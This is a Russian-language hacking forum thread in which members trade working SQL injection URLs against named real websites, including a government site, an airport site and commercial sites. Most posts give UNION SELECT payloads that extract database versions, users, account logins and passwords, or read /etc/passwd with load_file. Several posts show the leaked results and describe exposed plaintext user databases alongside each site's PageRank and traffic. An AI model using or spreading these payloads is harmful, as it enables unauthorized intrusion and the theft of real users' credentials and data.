SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. \/ITA

    \/ITA Member

    Joined:
    21 Sep 2011
    Messages:
    25
    Likes Received:
    28
    Reputations:
    8
    MSSQL POST SQLi в параметре 'inputString'
    URL:http://www.cotizalia.com/include/redicabecera.asp
    Яндекс тИЦ: 10
    Google Page Rank: 5/10

     
    3 people like this.
  2. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Сайт по созданию сайтов
    Студия Алексея Романова

    Таблицы
    Колонки
     
    2 people like this.
  3. automatic

    automatic New Member

    Joined:
    26 May 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Секси

    http://www.babestare.com/index.php?type=2+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6--

    5.1.63-cll:aiwebtoo_cremz@localhost:aiwebtoo_cremzinc
     
  4. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    PR=4
    По запросу "sex movies" - 3 место в выдаче.
    База ~43к юзеров, не хешированные пассы, приличный траф.
     
    _________________________
    1 person likes this.
  5. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    погимморился с фильтрами, но обошел :)

     
  6. \/ITA

    \/ITA Member

    Joined:
    21 Sep 2011
    Messages:
    25
    Likes Received:
    28
    Reputations:
    8
    MySQL: GET SQLi, параметр 'mode' в URL:http://www.sunporno.com/login.php

    Яндекс тИЦ (CY): 10
    Google PageRank (PR): 4/10


    VERSION()
    USER()
    DATABASE()
    Еще одна порнушка :D (тот же вектор)

    MySQL: GET SQLi, параметр 'mode' в URL:http://www.ah-me.com/channels.php

    Яндекс тИЦ (CY): 0
    Google PageRank (PR): 3/10


    MySQL: Error-based Duplicate entry GET SQLi в URL:http://piluli.ru/

    Яндекс тИЦ (CY): 600
    Google PageRank (PR): 4/10


    сложная кэш скуля, вместо [random_string] любые символы, с каждым запросом новые
    MySQL: GET SQLi параметр 'letter' в URL:http://www.classes.ru/all-spanish/

    Яндекс тИЦ (CY): 475
    Google PageRank (PR): 2/10


     
    #15066 \/ITA, 19 Jul 2012
    Last edited: 21 Jul 2012
    1 person likes this.
  7. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    PR: 6

    Code:
    http://www.mofa.[color="red"]gov[/color].bd/lbr/ViewLBR.php?txtUserId=-Canberra%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+
    
     
  8. ^NSA^

    ^NSA^ Elder - Старейшина

    Joined:
    3 Jul 2012
    Messages:
    64
    Likes Received:
    29
    Reputations:
    32
    Паки
     
  9. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    PR == 4;

    PHP:
    http://wap.indosat.com/produk_detail.php?i=-1+union+select+1,file_priv,3,4,5,6,7,8,9,10,11+from+mysql.user--
    ТИЦ == 10, PR == 1;

    PHP:
    http://www.debilz.com/index.phtml?id=-352+union+select+concat_ws(0x03a,id,Login,Password),2,3+from+accounts--
    PR == 2;

    PHP:
    http://sante.ismat.ch/article.php?id=-50+union+select+0,1,load_file('/etc/passwd'),3,4,5,6--
    http://sante.ismat.ch/phpinfo.php в помощь.
     
  10. ^NSA^

    ^NSA^ Elder - Старейшина

    Joined:
    3 Jul 2012
    Messages:
    64
    Likes Received:
    29
    Reputations:
    32
    iamsynergy
     
  11. a.dimka

    a.dimka Member

    Joined:
    14 Dec 2011
    Messages:
    0
    Likes Received:
    10
    Reputations:
    3
    Тиц 425
    ПР 8

     
  12. ^NSA^

    ^NSA^ Elder - Старейшина

    Joined:
    3 Jul 2012
    Messages:
    64
    Likes Received:
    29
    Reputations:
    32
    Кликеры
     
  13. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    ТИЦ == 30, PR == 5, DMOZ == true;

    PHP:
    http://www.thework.com/watch.php?yid=WsPAY_kpN8c&cat=ololo'+/*!union+all+select+1,2,3,4,load_file('/var/www/html/thework/robots.txt'),6,7,8,9,10,11,12,13,14,15,16,17*/--+h
     
    1 person likes this.
  14. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Code:
    http://dimdramteatr.ru/news_view.php?id=-12+union+select+1,concat%28user%28%29,0x3a,database%28%29%29,3,4,5--
    dimdramteatr_ddt@localhost:dimdramteatr_ddt
     
  15. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    Official Website for Larnaka & Pafos International Airports / PR: 5 / тИЦ: 50

    Code:
    http://www.[B]cyprusairports.com.cy[/B]/showpage.php?PageID=198[COLOR=Red][B]+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+m[/B][/COLOR]
    version: 5.0.96-0ubuntu3-log
    database: db_hermes
    user: db_h3rme5_air
     
  16. Simpliest

    Simpliest New Member

    Joined:
    29 Apr 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Что-то никак не получается реализовать SQL
    Code:
    http://il2.aviasibir.ru/mow/?page=pilot&pilotname=lemke'+and+1=1+union+select+1--+m
    Спасибо!
     
  17. \/ITA

    \/ITA Member

    Joined:
    21 Sep 2011
    Messages:
    25
    Likes Received:
    28
    Reputations:
    8
    MySQL: POST SQLi in param 'province_id' in URL:http://adoos.com/l/car

    Яндекс тИЦ (CY): 10
    Google PageRank (PR): 4/10
    Траффик Alexa: +0.08% (4 000 000 уников в день)

    Code:
    province_id=1' UNION ALL SELECT VERSION()#
    в базах юзеров пароли в Plain text :eek:
     
  18. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    [​IMG]

    http://www.salavat-tur.ru/salavat/?part=news&news_id=-15%20and%201=2%20union%20select%201,2,3,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),5+--

    5.1.41-log [email protected] salavat_tu_db portbld-freebsd7.2
     
  19. LiRvD082

    LiRvD082 Member

    Joined:
    4 Oct 2009
    Messages:
    44
    Likes Received:
    16
    Reputations:
    5
    http://www.keyshop.us/Product_list.php?cid=-97+UNION+SELECT+1999,@@version,3999,4999,5999,6999,9997,8999,9999--+

    http://www.tie4safe.com/product.php?pid=271+UNION+SELECT+table_name,2999,3999,9999,5999,6999,7999,8999,9999,19990+from+INFORMATION_SCHEMA.TABLES+limit+117,1--+
     
    1 person likes this.
  20. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Набранное вами сообщение слишком короткое. Увеличьте ваше сообщение до 4 символов.
     
Thread Status:
Not open for further replies.